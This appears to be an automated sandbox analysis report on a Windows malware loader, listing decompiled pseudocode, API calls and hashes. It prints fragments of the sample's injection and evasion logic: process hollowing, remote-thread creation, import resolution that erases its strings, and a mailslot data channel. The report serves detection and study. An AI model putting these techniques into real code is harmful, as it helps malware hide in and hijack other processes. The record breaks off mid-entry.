  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
